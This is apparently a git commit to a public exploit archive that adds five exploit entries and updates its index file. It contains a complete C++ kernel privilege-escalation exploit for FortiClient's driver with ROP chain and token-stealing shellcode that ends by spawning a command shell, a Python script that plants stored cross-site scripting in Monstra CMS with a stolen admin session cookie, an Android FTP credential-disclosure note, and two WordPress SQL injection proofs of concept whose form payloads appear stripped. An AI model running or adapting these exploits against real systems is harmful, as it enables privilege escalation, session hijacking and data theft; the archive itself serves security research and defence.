From 4af168769322ed454dd071545ed2a88bff80e4cf Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 8 Jun 2018 05:01:44 +0000 Subject: [PATCH] DB: 2018-06-08 5 changes to exploits/shellcodes macOS Kernel - Use-After-Free Due to Lack of Locking in nvidia GeForce Driver macOS/iOS Kernel - Heap Overflow Due to Lack of Lower Size Check in getvolattrlist Apple macOS Kernel - Use-After-Free Due to Lack of Locking in nvidia GeForce Driver Apple macOS/iOS Kernel - Heap Overflow Due to Lack of Lower Size Check in getvolattrlist Forticlient 5.2.3 (Windows 10 x64 Pre Anniversary) - Local Privilege Escalation Forticlient 5.2.3 (Windows 10 x64 Post Anniversary) - Local Privilege Escalation Fortinet FortiClient 5.2.3 (Windows 10 x64 Pre-Anniversary) - Local Privilege Escalation Fortinet FortiClient 5.2.3 (Windows 10 x64 Post-Anniversary) - Local Privilege Escalation Fortinet FortiClient 5.2.3 (Windows 10 x86) - Local Privilege Escalation Ftp Server 1.32 - Credential Disclosure WordPress Form Maker Plugin 1.12.24 - SQL Injection WordPress Contact Form Maker Plugin 1.12.20 - SQL Injection Monstra CMS < 3.0.4 - Cross-Site Scripting Automation --- exploits/android/local/44852.txt | 33 ++++ exploits/php/webapps/44853.txt | 39 +++++ exploits/php/webapps/44854.txt | 39 +++++ exploits/php/webapps/44855.py | 53 ++++++ exploits/windows_x86/local/41705.cpp | 243 +++++++++++++++++++++++++++ files_exploits.csv | 13 +- 6 files changed, 416 insertions(+), 4 deletions(-) create mode 100644 exploits/android/local/44852.txt create mode 100644 exploits/php/webapps/44853.txt create mode 100644 exploits/php/webapps/44854.txt create mode 100755 exploits/php/webapps/44855.py create mode 100644 exploits/windows_x86/local/41705.cpp diff --git a/exploits/android/local/44852.txt b/exploits/android/local/44852.txt new file mode 100644 index 000000000..5a737e378 --- /dev/null +++ b/exploits/android/local/44852.txt @@ -0,0 +1,33 @@ +# Exploit Title: Ftp Server 1.32 - Credential Disclosure +# Date: 2018-05-29 +# Software Link: https://play.google.com/store/apps/details?id=com.theolivetree.ftpserver +# Version: 1.32 Android App +# Vendor: The Olive Tree +# Exploit Author: ManhNho +# CVE: N/A +# Category: Mobile Apps +# Tested on: Android 4.4 + +# Description +# Ftp Server 1.32 Insecure Data Storage, the result of storing confidential +# information insecurely on the system i.e. poor encryption, plain text, +# access control issues etc. Attacker can find out username/password of valid user via +# /data/data/com.theolivetree.ftpserver/shared_prefs/com.theolivetree.ftpserver_preferences.xml + +# PoC + + + + 2221 + 2300-2399 + ManhNho + + + + 0 + 1 + ManhNho + + + + \ No newline at end of file diff --git a/exploits/php/webapps/44853.txt b/exploits/php/webapps/44853.txt new file mode 100644 index 000000000..37ecb04ed --- /dev/null +++ b/exploits/php/webapps/44853.txt @@ -0,0 +1,39 @@ +# Title: WordPress Form Maker Plugin 1.12.24 - SQL Injection +# Date: 2018-06-07 +# Author: Neven Biruski +# Software: WordPress Form Maker plugin +# https://wordpress.org/plugins/form-maker/ +# Version: 1.12.24 and below +# Vendor Status: Vendor contacted, update released + +# The easiest way to reproduce the SQL injection vulnerabilities is to +# open the presented HTML/JavaScript snippet in your browser while being +# logged in as administrator or another user that is authorized to +# access the plugin settings page. Users that do not have full +# administrative privileges could abuse the database access the +# vulnerabilities provide to either escalate their privileges or obtain +# and modify database contents they were not supposed to be able to. + +# PoC 1 + + +
+ +
+ + +# PoC 2 + + +
+ +
+ \ No newline at end of file diff --git a/exploits/php/webapps/44854.txt b/exploits/php/webapps/44854.txt new file mode 100644 index 000000000..bb2de2f7a --- /dev/null +++ b/exploits/php/webapps/44854.txt @@ -0,0 +1,39 @@ +# Title: WordPress Contact Form Maker Plugin 1.12.20 - SQL Injection +# Date: 2018-06-07 +# Author: Neven Biruski +# Software: WordPress Contact Form Maker plugin +# Software link: https://wordpress.org/plugins/contact-form-maker/ +# Version: 1.12.20 and below + +# The easiest way to reproduce the SQL injection vulnerabilities is to +# open the presented HTML/JavaScript snippet in your browser while being +# logged in as administrator or another user that is authorized to +# access the plugin settings page. Users that do not have full +# administrative privileges could abuse the database access the +# vulnerabilities provide to either escalate their privileges or obtain +# and modify database contents they were not supposed to be able to. + + +# PoC 1 + + +
+ +
+ + +# PoC 2 + + +
+ +
+ \ No newline at end of file diff --git a/exploits/php/webapps/44855.py b/exploits/php/webapps/44855.py new file mode 100755 index 000000000..0157fb712 --- /dev/null +++ b/exploits/php/webapps/44855.py @@ -0,0 +1,53 @@ +# Title: Monstra CMS < 3.0.4 - Cross-Site Scripting Automation +# Date: 2018-06-07 +# Author: DEEPIN2 +# Software: Monstra CMS +# Version: 3.0.4 and earlier + +import requests +import re + +def runXSS(target, cookie, data): + exploit = requests.post(target, cookies=cookie, data=data).text + if re.search('exploit', exploit): + return 'OK' + else: + return 'ERROR' + +if __name__ == '__main__': + print(''' ______ _______ ____ ___ _ ___ _ ___ _ _ ___ + / ___\ \ / / ____| |___ \ / _ \/ |( _ ) / |/ _ \/ / |( _ ) +| | \ \ / /| _| _____ __) | | | | |/ _ \ _____| | | | | | |/ _ ` +| |___ \ V / | |__|_____/ __/| |_| | | (_) |_____| | |_| | | | (_) | + \____| \_/ |_____| |_____|\___/|_|\___/ |_|\___/|_|_|\___/ + [*] Author : DEEPIN2(Junseo Lee) +---------------------------------------------------------------------''') + print('[*] Ex) http://www.target.com -> www.target.com') + url = input('Target : ') + print('[*] Required admin\'s PHPSESSID.') + PHPSESSID = input('PHPSESSID : ') + pagename = input('Pagename : ') + script = input('Script : ') + target = 'http://' + url + '/admin/index.php?id=pages&action=add_page' + cookie = {'PHPSESSID':PHPSESSID} + data = {'csrf':'9c1763649f4e5ce611d29ef5cd10914fa61e91f5',\ + 'page_title':script,\ + 'page_name':pagename,\ + 'page_meta_title':'',\ + 'page_keywords':'',\ + 'page_description':'',\ + 'pages':0,\ + 'templates':'index',\ + 'status':'published',\ + 'access':'public',\ + 'editor':'',\ + 'page_tags':'',\ + 'add_page_and_exit':'Save+and+Exit',\ + 'page_date':'9999-99-99'} + + result = runXSS(target, cookie, data) + print('-' * 69) + if result == 'OK': + print('[+] LINK : http://' + url + '/' + pagename) + else: + print('[-] Error') \ No newline at end of file diff --git a/exploits/windows_x86/local/41705.cpp b/exploits/windows_x86/local/41705.cpp new file mode 100644 index 000000000..bdd1543e5 --- /dev/null +++ b/exploits/windows_x86/local/41705.cpp @@ -0,0 +1,243 @@ +/* +Check these out: +- https://www.coresecurity.com/system/files/publications/2016/05/Windows%20SMEP%20bypass%20U%3DS.pdf +- https://labs.mwrinfosecurity.com/blog/a-tale-of-bitmaps/ +Tested on: +- Windows 10 Pro x86 1703/1709 +- ntoskrnl.exe: 10.0.16299.309 +- FortiShield.sys: 5.2.3.633 +Compile: +- i686-w64-mingw32-g++ forticlient_win10_x86.cpp -o forticlient_win10_x86.exe -m32 -lpsapi + +Thanks to master @ryujin and @ronin for helping out. And thanks to Morten (@Blomster81) for the MiGetPteAddress :D +and m00 to @g0tmi1k <3 +*/ + +#include +#include +#include +#include + +DWORD get_pxe_address_32(DWORD address) { + + DWORD result = address >> 9; + result = result | 0xC0000000; + result = result & 0xC07FFFF8; + return result; +} + +LPVOID GetBaseAddr(char *drvname) { + + LPVOID drivers[1024]; + DWORD cbNeeded; + int nDrivers, i = 0; + + if (EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded) && cbNeeded < sizeof(drivers)) { + char szDrivers[1024]; + nDrivers = cbNeeded / sizeof(drivers[0]); + for (i = 0; i < nDrivers; i++) { + if (GetDeviceDriverBaseName(drivers[i], (LPSTR)szDrivers, sizeof(szDrivers) / sizeof(szDrivers[0]))) { + if (strcmp(szDrivers, drvname) == 0) { + return drivers[i]; + } + } + } + } + return 0; +} + +int find_gadget(HMODULE lpFileName, unsigned char search_opcode[], int opcode_size) { + + PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)lpFileName; + if(dosHeader->e_magic != IMAGE_DOS_SIGNATURE) { + printf("[!] Invalid file.\n"); + exit(1); + } + + //Offset of NT Header is found at 0x3c location in DOS header specified by e_lfanew + //Get the Base of NT Header(PE Header) = dosHeader + RVA address of PE header + PIMAGE_NT_HEADERS ntHeader; + ntHeader = (PIMAGE_NT_HEADERS)((ULONGLONG)(dosHeader) + (dosHeader->e_lfanew)); + if(ntHeader->Signature != IMAGE_NT_SIGNATURE){ + printf("[!] Invalid PE Signature.\n"); + exit(1); + } + + //Info about Optional Header + IMAGE_OPTIONAL_HEADER opHeader; + opHeader = ntHeader->OptionalHeader; + + unsigned char *ntoskrnl_buffer = (unsigned char *)malloc(opHeader.SizeOfCode); + SIZE_T size_read; + + //ULONGLONG ntoskrnl_code_base = (ULONGLONG)lpFileName + opHeader.BaseOfCode; + BOOL rpm = ReadProcessMemory(GetCurrentProcess(), lpFileName, ntoskrnl_buffer, opHeader.SizeOfCode, &size_read); + if (rpm == 0) { + printf("[!] Error while calling ReadProcessMemory: %d\n", GetLastError()); + exit(1); + } + + int j; + int z; + DWORD gadget_offset = 0; + + for (j = 0; j < opHeader.SizeOfCode; j++) { + unsigned char *gadget = (unsigned char *)malloc(opcode_size); + memset(gadget, 0x00, opcode_size); + for (z = 0; z < opcode_size; z++) { + gadget[z] = ntoskrnl_buffer[j - z]; + } + + int comparison; + comparison = memcmp(search_opcode, gadget, opcode_size); + if (comparison == 0) { + gadget_offset = j - (opcode_size - 1); + } + } + + if (gadget_offset == 0) { + printf("[!] Error while retrieving the gadget, exiting.\n"); + exit(1); + } + return gadget_offset; +} + +LPVOID allocate_shellcode(LPVOID nt, DWORD fortishield_callback, DWORD fortishield_restore, DWORD pte_result, HMODULE lpFileName) { + + HANDLE pid; + pid = GetCurrentProcess(); + DWORD shellcode_address = 0x22ffe000; + LPVOID allocate_shellcode; + allocate_shellcode = VirtualAlloc((LPVOID *)shellcode_address, 0x12000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); + if (allocate_shellcode == NULL) { + printf("[!] Error while allocating rop_chain: %d\n", GetLastError()); + exit(1); + } + + + /** Windows 10 1703 ROPS + DWORD rop_01 = (DWORD)nt + 0x002fe484; + DWORD rop_02 = 0x00000063; + DWORD rop_03 = (DWORD)nt + 0x0002bbef; + DWORD rop_04 = (DWORD)pte_result - 0x01; + DWORD rop_05 = (DWORD)nt + 0x000f8d49; + DWORD rop_06 = 0x41414141; + DWORD rop_07 = (DWORD)nt + 0x000e8a46; + DWORD rop_08 = 0x2300d1b8; + **/ + + /** Windows 10 1709 ROPS **/ + DWORD rop_01 = (DWORD)nt + 0x0002a8c8; + DWORD rop_02 = 0x00000063; + DWORD rop_03 = (DWORD)nt + 0x0003a3a3; + DWORD rop_04 = (DWORD)pte_result - 0x01; + DWORD rop_05 = (DWORD)nt + 0x0008da19; + DWORD rop_06 = 0x41414141; + DWORD rop_07 = (DWORD)nt + 0x001333ce; + DWORD rop_08 = 0x2300d1b8; + + char token_steal[] = "\x90\x90\x90\x90\x90\x90\x90\x90" + "\x8b\x84\x24\xa0\x00\x00\x00\x31" + "\xc9\x89\x08\x31\xc0\x64\x8b\x80" + "\x24\x01\x00\x00\x8b\x80\x80\x00" + "\x00\x00\x89\xc1\x8b\x80\xb8\x00" + "\x00\x00\x2d\xb8\x00\x00\x00\x83" + "\xb8\xb4\x00\x00\x00\x04\x75\xec" + "\x8b\x90\xfc\x00\x00\x00\x89\x91" + "\xfc\x00\x00\x00\x89\xf8\x83\xe8" + "\x20\x50\x8b\x84\x24\xa8\x00\x00" + "\x00\x5c\x89\x04\x24\x89\xfd\x81" + "\xc5\x04\x04\x00\x00\xc2\x04\x00"; + + char *shellcode; + DWORD shellcode_size = 0x12000; + shellcode = (char *)malloc(shellcode_size); + memset(shellcode, 0x41, shellcode_size); + memcpy(shellcode + 0x2000, &rop_01, 0x04); + memcpy(shellcode + 0xf18f, &rop_02, 0x04); + memcpy(shellcode + 0xf193, &rop_03, 0x04); + memcpy(shellcode + 0xf197, &rop_04, 0x04); + memcpy(shellcode + 0xf19b, &rop_05, 0x04); + memcpy(shellcode + 0xf19f, &rop_06, 0x04); + memcpy(shellcode + 0xf1a3, &rop_07, 0x04); + memcpy(shellcode + 0xf1af, &rop_08, 0x04); + memcpy(shellcode + 0xf1b8, &token_steal, sizeof(token_steal)); + memcpy(shellcode + 0xf253, &fortishield_callback, 0x04); + memcpy(shellcode + 0xf257, &fortishield_restore, 0x04); + + + BOOL WPMresult; + SIZE_T written; + WPMresult = WriteProcessMemory(pid, (LPVOID)shellcode_address, shellcode, shellcode_size, &written); + if (WPMresult == 0) + { + printf("[!] Error while calling WriteProcessMemory: %d\n", GetLastError()); + exit(1); + } + printf("[+] Memory allocated at: %p\n", allocate_shellcode); + return allocate_shellcode; +} + +DWORD trigger_callback() { + + printf("[+] Creating dummy file\n"); + system("echo test > test.txt"); + + printf("[+] Calling MoveFileEx()\n"); + BOOL MFEresult; + MFEresult = MoveFileEx((LPCSTR)"test.txt", (LPCSTR)"test2.txt", MOVEFILE_REPLACE_EXISTING); + if (MFEresult == 0) + { + printf("[!] Error while calling MoveFileEx(): %d\n", GetLastError()); + return 1; + } + return 0; +} + +int main() { + + HANDLE forti; + forti = CreateFile((LPCSTR)"\\\\.\\FortiShield", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL); + if (forti == INVALID_HANDLE_VALUE) { + printf("[!] Error while creating a handle to the driver: %d\n", GetLastError()); + return 1; + } + + HMODULE ntoskrnl = LoadLibrary((LPCSTR)"C:\\Windows\\System32\\ntoskrnl.exe"); + if (ntoskrnl == NULL) { + printf("[!] Error while loading ntoskrnl: %d\n", GetLastError()); + exit(1); + } + + LPVOID nt = GetBaseAddr((char *)"ntoskrnl.exe"); + LPVOID fortishield_base = GetBaseAddr((char *)"FortiShield.sys"); + + DWORD va_pte = get_pxe_address_32(0x2300d000); + DWORD pivot = (DWORD)nt + 0x0009b8eb; + DWORD fortishield_callback = (DWORD)fortishield_base + 0xba70; + DWORD fortishield_restore = (DWORD)fortishield_base + 0x1e95; + + printf("[+] KERNEL found at: %llx\n", (DWORD)nt); + printf("[+] FortiShield.sys found at: %llx\n", (DWORD)fortishield_base); + printf("[+] PTE virtual address at: %llx\n", va_pte); + + LPVOID shellcode_allocation; + shellcode_allocation = allocate_shellcode(nt, fortishield_callback, fortishield_restore, va_pte, ntoskrnl); + + DWORD IoControlCode = 0x220028; + DWORD InputBuffer = pivot; + DWORD InputBufferLength = 0x4; + DWORD OutputBuffer = 0x0; + DWORD OutputBufferLength = 0x0; + DWORD lpBytesReturned; + + //DebugBreak(); + + BOOL triggerIOCTL; + triggerIOCTL = DeviceIoControl(forti, IoControlCode, (LPVOID)&InputBuffer, InputBufferLength, (LPVOID)&OutputBuffer, OutputBufferLength, &lpBytesReturned, NULL); + trigger_callback(); + + system("start cmd.exe"); + + return 0; +} \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 343b49a8c..80fef3870 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -5988,8 +5988,8 @@ id,file,description,date,author,type,platform,port 44821,exploits/multiple/dos/44821.txt,"Epiphany 3.28.2.1 - Denial of Service",2018-06-01,"Dhiraj Mishra",dos,multiple, 44832,exploits/linux/dos/44832.txt,"Linux Kernel < 4.16.11 - 'ext4_read_inline_data()' Memory Corruption",2018-06-05,"Google Security Research",dos,linux, 44846,exploits/php/dos/44846.txt,"PHP 7.2.2 - 'php_stream_url_wrap_http_ex' Buffer Overflow",2018-06-06,"Wei Lei and Liu Yang",dos,php, -44847,exploits/macos/dos/44847.c,"macOS Kernel - Use-After-Free Due to Lack of Locking in nvidia GeForce Driver",2018-06-06,"Google Security Research",dos,macos, -44848,exploits/multiple/dos/44848.c,"macOS/iOS Kernel - Heap Overflow Due to Lack of Lower Size Check in getvolattrlist",2018-06-06,"Google Security Research",dos,multiple, +44847,exploits/macos/dos/44847.c,"Apple macOS Kernel - Use-After-Free Due to Lack of Locking in nvidia GeForce Driver",2018-06-06,"Google Security Research",dos,macos, +44848,exploits/multiple/dos/44848.c,"Apple macOS/iOS Kernel - Heap Overflow Due to Lack of Lower Size Check in getvolattrlist",2018-06-06,"Google Security Research",dos,multiple, 44849,exploits/multiple/dos/44849.txt,"XNU Kernel - Heap Overflow Due to Bad Bounds Checking in MPTCP",2018-06-06,"Google Security Research",dos,multiple, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, @@ -9490,8 +9490,8 @@ id,file,description,date,author,type,platform,port 41887,exploits/windows/local/41887.txt,"VirusChaser 8.0 - Local Buffer Overflow (SEH)",2017-04-14,0x41Li,local,windows, 42305,exploits/linux/local/42305.txt,"NfSen < 1.3.7 / AlienVault OSSIM < 5.3.6 - Local Privilege Escalation",2017-07-10,"Paul Taylor",local,linux, 41886,exploits/linux/local/41886.c,"Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation",2017-04-15,"Nassim Asrir",local,linux, -41721,exploits/windows_x86-64/local/41721.c,"Forticlient 5.2.3 (Windows 10 x64 Pre Anniversary) - Local Privilege Escalation",2017-03-25,sickness,local,windows_x86-64, -41722,exploits/windows_x86-64/local/41722.c,"Forticlient 5.2.3 (Windows 10 x64 Post Anniversary) - Local Privilege Escalation",2017-03-25,sickness,local,windows_x86-64, +41721,exploits/windows_x86-64/local/41721.c,"Fortinet FortiClient 5.2.3 (Windows 10 x64 Pre-Anniversary) - Local Privilege Escalation",2017-03-25,sickness,local,windows_x86-64, +41722,exploits/windows_x86-64/local/41722.c,"Fortinet FortiClient 5.2.3 (Windows 10 x64 Post-Anniversary) - Local Privilege Escalation",2017-03-25,sickness,local,windows_x86-64, 41745,exploits/hardware/local/41745.txt,"QNAP QTS < 4.2.4 - Domain Privilege Escalation",2017-03-27,"Pasquale Fiorillo",local,hardware, 41754,exploits/hardware/local/41754.txt,"Intermec PM43 Industrial Printer - Local Privilege Escalation",2017-03-28,"Jean-Marie Bourbon",local,hardware, 41760,exploits/linux/local/41760.txt,"Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege Escalation",2016-02-22,halfdog,local,linux, @@ -9767,6 +9767,8 @@ id,file,description,date,author,type,platform,port 44840,exploits/windows_x86/local/44840.py,"10-Strike Network Inventory Explorer 8.54 - 'Registration Key' Buffer Overflow (SEH)",2018-06-05,"Hashim Jawad",local,windows_x86, 44841,exploits/windows_x86/local/44841.py,"10-Strike Network Scanner 3.0 - Local Buffer Overflow (SEH)",2018-06-05,"Hashim Jawad",local,windows_x86, 44842,exploits/linux/local/44842.txt,"WebKitGTK+ < 2.21.3 - Crash (PoC)",2018-06-05,"Dhiraj Mishra",local,linux, +41705,exploits/windows_x86/local/41705.cpp,"Fortinet FortiClient 5.2.3 (Windows 10 x86) - Local Privilege Escalation",2017-03-11,sickness,local,windows_x86, +44852,exploits/android/local/44852.txt,"Ftp Server 1.32 - Credential Disclosure",2018-06-07,ManhNho,local,android, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -39513,3 +39515,6 @@ id,file,description,date,author,type,platform,port 44843,exploits/linux/webapps/44843.py,"Jenkins Mailer Plugin < 1.20 - Cross-Site Request Forgery (Send Email)",2018-06-05,Kl3_GMjq6,webapps,linux, 44844,exploits/hardware/webapps/44844.txt,"Canon LBP6650/LBP3370/LBP3460/LBP7750C - Authenticaton Bypass",2018-06-06,"Huy Kha",webapps,hardware, 44845,exploits/hardware/webapps/44845.txt,"Canon MF210/MF220 - Authenticaton Bypass",2018-06-06,"Huy Kha",webapps,hardware, +44853,exploits/php/webapps/44853.txt,"WordPress Form Maker Plugin 1.12.24 - SQL Injection",2018-06-07,defensecode,webapps,php, +44854,exploits/php/webapps/44854.txt,"WordPress Contact Form Maker Plugin 1.12.20 - SQL Injection",2018-06-07,defensecode,webapps,php, +44855,exploits/php/webapps/44855.py,"Monstra CMS < 3.0.4 - Cross-Site Scripting Automation",2018-06-07,DEEPIN2,webapps,php,